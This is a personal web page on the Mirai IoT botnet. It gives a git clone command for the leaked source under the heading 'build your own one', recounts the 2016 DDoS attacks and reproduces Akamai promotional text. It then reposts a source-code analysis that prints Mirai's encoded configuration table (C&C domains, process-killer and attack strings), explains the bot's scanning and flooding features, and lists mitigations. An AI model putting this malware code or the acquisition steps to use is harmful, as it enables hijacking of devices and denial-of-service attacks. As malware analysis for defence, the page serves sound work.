legal contact
 

Mirai BotNet

Analysing the Mirai sourcecode

The Mirai sourcecode (build your own one)

Checkout GitHUB to get the sourcecode of the Mirai-BotNet or use the cloned version from my site.

Another way would by to clone it to your machine with:

git clone https://github.com/jgamblin/Mirai-Source-Code.git

The documentation about install and use can be found here.

Also needed is this SQL file containing the statements to create the DB.

Describing the effect of a massive DDOS

As per WiKi

Mirai was used in the DDoS attack on 20 September 2016 on the Krebs on Security site which reached 620 Gbps.[11] Ars Technica also reported a 1 Tbps attack on French web host OVH.[2]

On 21 October 2016 multiple major DDoS attacks in DNS services of DNS service provider Dyn occurred using Mirai malware installed on a large number of IoT devices, resulting in the inaccessibility of several high profile websites such as GitHubTwitterReddit,NetflixAirbnb and many others.[12] The attribution of the attack to the Mirai botnet was originally reported by BackConnect, a security firm.[13]

Staff at Deep Learning Security observed the steady growth of Mirai botnets before and after the 21 October attack.[14]

Checkout Brian Krebs article as well as he was one of the first victims.

Hackforums Shutters Booter Service Bazaar

 

The enabler of Mirai - the IOT passwords

The abused "bots" were a quite big range of "stupid" devices being reachable from the Internet with default passwords. This way, the attacker could plant his evil code into the device and turn it to his personals slave.

The key to achieve this, were the still untouched default passwords of the devices.

Stephen Ragan has write a nive article about that and listed the passwords/accounts used.

DDOS mitigation (Akamai Kona Site Defender)

To my knowledge there is not real solution to defend againt a real bid DDOS-attack.
Even large Internetbandwidth (like Akamai, Google, DYN, etc.) is filled up at a certain amount of requests. If you are trying to fight againt a 1,7TBit DOS, you're out a luck.

Anyway, tzere are several aproches to overcome a DDOS-attack by adding more bandwith. Akamais "Kona Site Defender" is just an example.

Check the original articel from Akamai here:

With distributed denial of service (DDoS) attacks a continuing threat to websites, networks and servers, DDoS mitigation is high on the priority list for enterprise security teams. DDoS attacks are perpetrated by hackers who remotely control computer "bots" – systems that have been taken over via malware. By directing hundreds of thousands of these hijacked computers to send requests to a single target, a DDoS attack floods a website or application with an overwhelming amount of traffic, causing the target servers to respond very slowly or to crash.

While DDoS attacks are one of the older forms of cyber threats, DDoS mitigation today is harder than ever. DDoS perpetrators have changed their focus from the transport and network layers to the application layer where DDoS protection is more difficult. Methods of attack have grown more sophisticated, too – the volume of requests sent to a target has multiply exponentially in recent DDoS attacks, and most enterprise IT security programs are unable to scale to achieve adequate DDoS mitigation. DDoS attacks are also used to mask other forms of data breaches. For these reasons, many leading enterprises have turned to DDoS mitigation solutions from Akamai.

DDoS mitigation with Akamai

Akamai provides DDoS mitigation solutions for some of the world's biggest brands – the companies who understand that any degradation or denial of service can do lasting damage to revenue, reputation and customer loyalty.

Akamai Kona Site Defender is a multi-layered DDoS mitigation solution that provides unmatched web and application protection delivered through an intelligent platform with more than 137,000 servers in more than 87 countries. Without diminishing web performance or availability, Kona Site Defender extends security beyond the data center and can detect, identify and mitigate DDoS attacks before they reach the origin.

This powerful Akamai DDoS mitigation solution deflects network-layer DDoS traffic and absorbs application-layer DDoS traffic at the network edge. Mitigation capabilities are implemented natively in-path to fend off attacks in the cloud before they can reach the customer origin. A highly scalable Web Application Firewall (WAF) provides additional protection against application-layer attacks in HTTP and HTPS traffic.

Benefits of Kona Site Defender for DDoS mitigation

With Akamai Kona Site Defender, enterprises can:

  • Reduce downtime and minimize business risk with a DDoS mitigation solution that can deflect and absorb the largest DDoS attacks.
  • Maintain web site and application performance throughout attacks with Akamai's globally distributed architecture.
  • Minimize costs associated with web security.
  • Protect against new and evolving threats by relying on Kona Rules, which are regularly updated by Akamai's Threat Intelligence Team.
  • Reduce the risk of data theft with Akamai Web Application Firewall.

The Mirai analysis

Below excelent article can be yound here: http://blog.nsfocus.net/mirai-source-code-analysis-report
I just allowed myself to extend it here and there by my own comments and comclusions

Code Structure

As shown in Figure 1, there are two folders. The loader folder, as its name implies, is a loader that creates servers and monitors the status of connections. The mirai folder implements major malicious functions, including such tool implementations as establishing network connections, executing DDoS attacks, and downloading data, and operations from the main control terminal.

Infection Path

Attackers can use an SSH or Telnet account and default passwords to compromise Internet of Things (IoT) devices.

Function Implementation

The source code reveals that the following malicious functions can be implemented:

  • bot folder: performs such operations as anti-debugging, hiding of its own process, configuration of initial port numbers for domain names, configuration of default weak passwords, establishment of network connections, and DDoS execution.
  • tools folder: performs tool-based operations such as wget, file updating, and XOR operations.
  • cnc folder: monitors the successfully infected bots from the main control terminal, parses instructions as a receiver, and launches DDoS attacks.

When implementing functions, the code in the bot folder opens PF_INET (TCP raw socket for UNIX networks) and binds it to TCP port 48101 at the local host IP address of 127.0.0.1. Then it can listen for incoming connections. When one device on a network is infected, the infection will spread to other devices on the same network via the Telnet service.

bot Folder

In terms of functionality, the code in the bot folder can perform the following operations:

Anti-GDB debugging, CC address parsing, establishment of network connections, and DDoS execution.

static void anti_gdb_entry(int);
static void resolve_cnc_addr(void);
static void establish_connection(void);
static void teardown_connection(void);
static void ensure_single_instance(void);
static BOOL unlock_tbl_if_nodebug(char *);  

//Anti-GDB debugging.
//Parses CC addresses.
//Establishes network connections.
//Establishes network connections.
//Ensures that only one instance is running each time (deletes the existing process when detecting a new instance running).//Initializes various tables (including the list of connected domain names and port numbers and that of user names and passwords).

If detecting GDB debugging, the program deletes its own execution file, prevents the watchdog from restarting the device, and prompts a CC address connection failure.

To ensure that each time only one instance is running (by connecting to the local port 48101) and kill the process corresponding to port 48101:

To hide the process:

To initialize attack type parameters and provide various attack types (UDP, VSE, DNS, SYN, and other DDoS attack types) for attackers to choose:

To initialize port settings by shutting down ports to terminate other processes that use Telnet, SSH, and HTTP services and prevent them from restarting:

To initialize scanning parameters and scan other devices on the LAN with weak passwords and with port 23 opened:
Cool are the excludes of some IP ranges. Especially the author obviously doesn't want to fool with.  ;-)

The cryptographic algorithm for user names and passwords is as follows:

When detecting a new instance running, the program kills its own process and stops scanning and all attack tasks.

Connected Domain Names and Port Numbers

The connected domain names and port numbers are hardcoded into source code. In this case, domain name strings can be decrypted by using the algorithm shown in enc.c in the tools folder.

void table_init(void)
{    
add_entry(TABLE_CNC_DOMAIN, "\x41\x4C\x41\x0C\x41\x4A\x43\x4C\x45\x47\x4F\x47\x0C\x41\x4D\x4F\x22", 30); // cnc.changeme.com 
add_entry(TABLE_CNC_PORT, "\x22\x35", 2);   // 23     
add_entry(TABLE_SCAN_CB_DOMAIN, "\x50\x47\x52\x4D\x50\x56\x0C\x41\x4A\x43\x4C\x45\x47\x4F\x47\x0C\x41\x4D\x4F\x22", 29); // report.changeme.com    
add_entry(TABLE_SCAN_CB_PORT, "\x99\xC7", 2);         // 48101     
add_entry(TABLE_EXEC_SUCCESS, "\x4E\x4B\x51\x56\x47\x4C\x4B\x4C\x45\x02\x56\x57\x4C\x12\x22", 15);    // safe string https://youtu.be/dQw4w9WgXcQ    
add_entry(TABLE_KILLER_SAFE, "\x4A\x56\x56\x52\x51\x18\x0D\x0D\x5B\x4D\x57\x56\x57\x0C\x40\x47\x0D\x46\x73\x55\x16\x55\x1B\x75\x45\x7A\x41\x73\x22", 29);    
add_entry(TABLE_KILLER_PROC, "\x0D\x52\x50\x4D\x41\x0D\x22", 7);    
add_entry(TABLE_KILLER_EXE, "\x0D\x47\x5A\x47\x22", 5);    
add_entry(TABLE_KILLER_DELETED, "\x02\x0A\x46\x47\x4E\x47\x56\x47\x46\x0B\x22", 11);    
add_entry(TABLE_KILLER_FD, "\x0D\x44\x46\x22", 4);    
add_entry(TABLE_KILLER_ANIME, "\x0C\x43\x4C\x4B\x4F\x47\x22", 7);    
add_entry(TABLE_KILLER_STATUS, "\x0D\x51\x56\x43\x56\x57\x51\x22", 8);    
add_entry(TABLE_MEM_QBOT, "\x70\x67\x72\x6D\x70\x76\x02\x07\x51\x18\x07\x51\x22", 13);    
add_entry(TABLE_MEM_QBOT2, "\x6A\x76\x76\x72\x64\x6E\x6D\x6D\x66\x22", 10);    
add_entry(TABLE_MEM_QBOT3, "\x6E\x6D\x6E\x6C\x6D\x65\x76\x64\x6D\x22", 10);    
add_entry(TABLE_MEM_UPX, "\x7E\x5A\x17\x1A\x7E\x5A\x16\x66\x7E\x5A\x16\x67\x7E\x5A\x16\x67\x7E\x5A\x16\x11\x7E\x5A\x17\x12\x7E\x5A\x16\x14\x7E\x5A\x10\x10\x22", 33);    
add_entry(TABLE_MEM_ZOLLARD, "\x58\x4D\x4E\x4E\x43\x50\x46\x22", 8);    
add_entry(TABLE_MEM_REMAITEN, "\x65\x67\x76\x6E\x6D\x61\x63\x6E\x6B\x72\x22", 11);    
add_entry(TABLE_SCAN_SHELL, "\x51\x4A\x47\x4E\x4E\x22", 6);    
add_entry(TABLE_SCAN_ENABLE, "\x47\x4C\x43\x40\x4E\x47\x22", 7);    
add_entry(TABLE_SCAN_SYSTEM, "\x51\x5B\x51\x56\x47\x4F\x22", 7);    
add_entry(TABLE_SCAN_SH, "\x51\x4A\x22", 3);    
add_entry(TABLE_SCAN_QUERY, "\x0D\x40\x4B\x4C\x0D\x40\x57\x51\x5B\x40\x4D\x5A\x02\x6F\x6B\x70\x63\x6B\x22", 19);    
add_entry(TABLE_SCAN_RESP, "\x6F\x6B\x70\x63\x6B\x18\x02\x43\x52\x52\x4E\x47\x56\x02\x4C\x4D\x56\x02\x44\x4D\x57\x4C\x46\x22", 24);    
add_entry(TABLE_SCAN_NCORRECT, "\x4C\x41\x4D\x50\x50\x47\x41\x56\x22", 9);    
add_entry(TABLE_SCAN_PS, "\x0D\x40\x4B\x4C\x0D\x40\x57\x51\x5B\x40\x4D\x5A\x02\x52\x51\x22", 16);    
add_entry(TABLE_SCAN_KILL_9, "\x0D\x40\x4B\x4C\x0D\x40\x57\x51\x5B\x40\x4D\x5A\x02\x49\x4B\x4E\x4E\x02\x0F\x1B\x02\x22", 22);    
add_entry(TABLE_ATK_VSE, "\x76\x71\x4D\x57\x50\x41\x47\x02\x67\x4C\x45\x4B\x4C\x47\x02\x73\x57\x47\x50\x5B\x22", 21);    
add_entry(TABLE_ATK_RESOLVER, "\x0D\x47\x56\x41\x0D\x50\x47\x51\x4D\x4E\x54\x0C\x41\x4D\x4C\x44\x22", 17);    
add_entry(TABLE_ATK_NSERV, "\x4C\x43\x4F\x47\x51\x47\x50\x54\x47\x50\x02\x22", 12);    
add_entry(TABLE_ATK_KEEP_ALIVE, "\x61\x4D\x4C\x4C\x47\x41\x56\x4B\x4D\x4C\x18\x02\x49\x47\x47\x52\x0F\x43\x4E\x4B\x54\x47\x22", 23);    
add_entry(TABLE_ATK_ACCEPT, "\x63\x41\x41\x47\x52\x56\x18\x02\x56\x47\x5A\x56\x0D\x4A\x56\x4F\x4E\x0E\x43\x52\x52\x4E\x4B\x41\x43\x56\x4B\x4D\x4C\x0D\x5A\x4A\x56\x4F\x4E\x09\x5A\x4F\x4E\x0E\x43\x52\x52\x4E\x4B\x41\x43\x56\x4B\x4D\x4C\x0D\x5A\x4F\x4E\x19\x53\x1F\x12\x0C\x1B\x0E\x4B\x4F\x43\x45\x47\x0D\x55\x47\x40\x52\x0E\x08\x0D\x08\x19\x53\x1F\x12\x0C\x1A\x22", 83);    
add_entry(TABLE_ATK_ACCEPT_LNG, "\x63\x41\x41\x47\x52\x56\x0F\x6E\x43\x4C\x45\x57\x43\x45\x47\x18\x02\x47\x4C\x0F\x77\x71\x0E\x47\x4C\x19\x53\x1F\x12\x0C\x1A\x22", 32);    
add_entry(TABLE_ATK_CONTENT_TYPE, "\x61\x4D\x4C\x56\x47\x4C\x56\x0F\x76\x5B\x52\x47\x18\x02\x43\x52\x52\x4E\x4B\x41\x43\x56\x4B\x4D\x4C\x0D\x5A\x0F\x55\x55\x55\x0F\x44\x4D\x50\x4F\x0F\x57\x50\x4E\x47\x4C\x41\x4D\x46\x47\x46\x22", 48);    
add_entry(TABLE_ATK_SET_COOKIE, "\x51\x47\x56\x61\x4D\x4D\x49\x4B\x47\x0A\x05\x22", 12);    
add_entry(TABLE_ATK_REFRESH_HDR, "\x50\x47\x44\x50\x47\x51\x4A\x18\x22", 9);    
add_entry(TABLE_ATK_LOCATION_HDR, "\x4E\x4D\x41\x43\x56\x4B\x4D\x4C\x18\x22", 10);    
add_entry(TABLE_ATK_SET_COOKIE_HDR, "\x51\x47\x56\x0F\x41\x4D\x4D\x49\x4B\x47\x18\x22", 12);    
add_entry(TABLE_ATK_CONTENT_LENGTH_HDR, "\x41\x4D\x4C\x56\x47\x4C\x56\x0F\x4E\x47\x4C\x45\x56\x4A\x18\x22", 16);    
add_entry(TABLE_ATK_TRANSFER_ENCODING_HDR, "\x56\x50\x43\x4C\x51\x44\x47\x50\x0F\x47\x4C\x41\x4D\x46\x4B\x4C\x45\x18\x22", 19);    
add_entry(TABLE_ATK_CHUNKED, "\x41\x4A\x57\x4C\x49\x47\x46\x22", 8);    add_entry(TABLE_ATK_KEEP_ALIVE_HDR, "\x49\x47\x47\x52\x0F\x43\x4E\x4B\x54\x47\x22", 11);    
add_entry(TABLE_ATK_CONNECTION_HDR, "\x41\x4D\x4C\x4C\x47\x41\x56\x4B\x4D\x4C\x18\x22", 12);    
add_entry(TABLE_ATK_DOSARREST, "\x51\x47\x50\x54\x47\x50\x18\x02\x46\x4D\x51\x43\x50\x50\x47\x51\x56\x22", 18);    
add_entry(TABLE_ATK_CLOUDFLARE_NGINX, "\x51\x47\x50\x54\x47\x50\x18\x02\x41\x4E\x4D\x57\x46\x44\x4E\x43\x50\x47\x0F\x4C\x45\x4B\x4C\x5A\x22", 25);     
add_entry(TABLE_HTTP_ONE, "\x6F\x4D\x58\x4B\x4E\x4E\x43\x0D\x17\x0C\x12\x02\x0A\x75\x4B\x4C\x46\x4D\x55\x51\x02\x6C\x76\x02\x13\x12\x0C\x12\x19\x02\x75\x6D\x75\x14\x16\x0B\x02\x63\x52\x52\x4E\x47\x75\x47\x40\x69\x4B\x56\x0D\x17\x11\x15\x0C\x11\x14\x02\x0A\x69\x6A\x76\x6F\x6E\x0E\x02\x4E\x4B\x49\x47\x02\x65\x47\x41\x49\x4D\x0B\x02\x61\x4A\x50\x4D\x4F\x47\x0D\x17\x13\x0C\x12\x0C\x10\x15\x12\x16\x0C\x13\x12\x11\x02\x71\x43\x44\x43\x50\x4B\x0D\x17\x11\x15\x0C\x11\x14\x22", 111);    
add_entry(TABLE_HTTP_TWO, "\x6F\x4D\x58\x4B\x4E\x4E\x43\x0D\x17\x0C\x12\x02\x0A\x75\x4B\x4C\x46\x4D\x55\x51\x02\x6C\x76\x02\x13\x12\x0C\x12\x19\x02\x75\x6D\x75\x14\x16\x0B\x02\x63\x52\x52\x4E\x47\x75\x47\x40\x69\x4B\x56\x0D\x17\x11\x15\x0C\x11\x14\x02\x0A\x69\x6A\x76\x6F\x6E\x0E\x02\x4E\x4B\x49\x47\x02\x65\x47\x41\x49\x4D\x0B\x02\x61\x4A\x50\x4D\x4F\x47\x0D\x17\x10\x0C\x12\x0C\x10\x15\x16\x11\x0C\x13\x13\x14\x02\x71\x43\x44\x43\x50\x4B\x0D\x17\x11\x15\x0C\x11\x14\x22", 111);    
add_entry(TABLE_HTTP_THREE, "\x6F\x4D\x58\x4B\x4E\x4E\x43\x0D\x17\x0C\x12\x02\x0A\x75\x4B\x4C\x46\x4D\x55\x51\x02\x6C\x76\x02\x14\x0C\x13\x19\x02\x75\x6D\x75\x14\x16\x0B\x02\x63\x52\x52\x4E\x47\x75\x47\x40\x69\x4B\x56\x0D\x17\x11\x15\x0C\x11\x14\x02\x0A\x69\x6A\x76\x6F\x6E\x0E\x02\x4E\x4B\x49\x47\x02\x65\x47\x41\x49\x4D\x0B\x02\x61\x4A\x50\x4D\x4F\x47\x0D\x17\x13\x0C\x12\x0C\x10\x15\x12\x16\x0C\x13\x12\x11\x02\x71\x43\x44\x43\x50\x4B\x0D\x17\x11\x15\x0C\x11\x14\x22", 110);    
add_entry(TABLE_HTTP_FOUR, "\x6F\x4D\x58\x4B\x4E\x4E\x43\x0D\x17\x0C\x12\x02\x0A\x75\x4B\x4C\x46\x4D\x55\x51\x02\x6C\x76\x02\x14\x0C\x13\x19\x02\x75\x6D\x75\x14\x16\x0B\x02\x63\x52\x52\x4E\x47\x75\x47\x40\x69\x4B\x56\x0D\x17\x11\x15\x0C\x11\x14\x02\x0A\x69\x6A\x76\x6F\x6E\x0E\x02\x4E\x4B\x49\x47\x02\x65\x47\x41\x49\x4D\x0B\x02\x61\x4A\x50\x4D\x4F\x47\x0D\x17\x10\x0C\x12\x0C\x10\x15\x16\x11\x0C\x13\x13\x14\x02\x71\x43\x44\x43\x50\x4B\x0D\x17\x11\x15\x0C\x11\x14\x22", 110);    
add_entry(TABLE_HTTP_FIVE, "\x6F\x4D\x58\x4B\x4E\x4E\x43\x0D\x17\x0C\x12\x02\x0A\x6F\x43\x41\x4B\x4C\x56\x4D\x51\x4A\x19\x02\x6B\x4C\x56\x47\x4E\x02\x6F\x43\x41\x02\x6D\x71\x02\x7A\x02\x13\x12\x7D\x13\x13\x7D\x14\x0B\x02\x63\x52\x52\x4E\x47\x75\x47\x40\x69\x4B\x56\x0D\x14\x12\x13\x0C\x15\x0C\x15\x02\x0A\x69\x6A\x76\x6F\x6E\x0E\x02\x4E\x4B\x49\x47\x02\x65\x47\x41\x49\x4D\x0B\x02\x74\x47\x50\x51\x4B\x4D\x4C\x0D\x1B\x0C\x13\x0C\x10\x02\x71\x43\x44\x43\x50\x4B\x0D\x14\x12\x13\x0C\x15\x0C\x15\x22", 117);
}

The target is devices that use busybox.

DDoS Attack Methods

User Name and Password Configuration

cnc Folder

The code in this folder listens for ports 23 and 101 and performs different operations accordingly from the main control terminal.

When listening for port 23, the program determines what to do next based on the received data. If the received data contains 4 bytes, which are 00 00 00 x (x > 0), the program determines that such data is from a bot and adds the related host as a new bot. Otherwise, the program finds out whether access with an admin account is allowed. After successful login, an attacker can create admin accounts and configure bots and bot hosts by using different commands.

When port 101 is involved, the program parses the received information to obtain commands for launching a new round of attack. Attacks that can be launched include UDP, DNS, SYN, ACK, STOMP, GRE IP, GRE Ethernet, and HTTP floods and Valve Source Engine (VSE) specific floods.

tools Folder

Single_Load.c That Loads Files

Execution result:

Wget.c That Obtains Remote Files

Execution result:

Nogdb.c That Updates File Information

Execution result:

Badbot.c That Displays Information of a Specified Bot

Enc.c

Usage: %s <string | ip | uint32 | uint16 | uint8 | bool> <data>

loader Folder

The code in this folder serves to create a server and monitor the status of connections.

Workarounds

Mirai mainly targets devices with Linux as the operating system and busybox installed. To protect against this malware, we recommend the following workarounds:

  1. Enhance security of user names and passwords by changing initial passwords and weak passwords.
  2. Disable port 48101.
  3. Disable Telnet connections that use port 23.
  4. Restrict the use of busybox to specific users.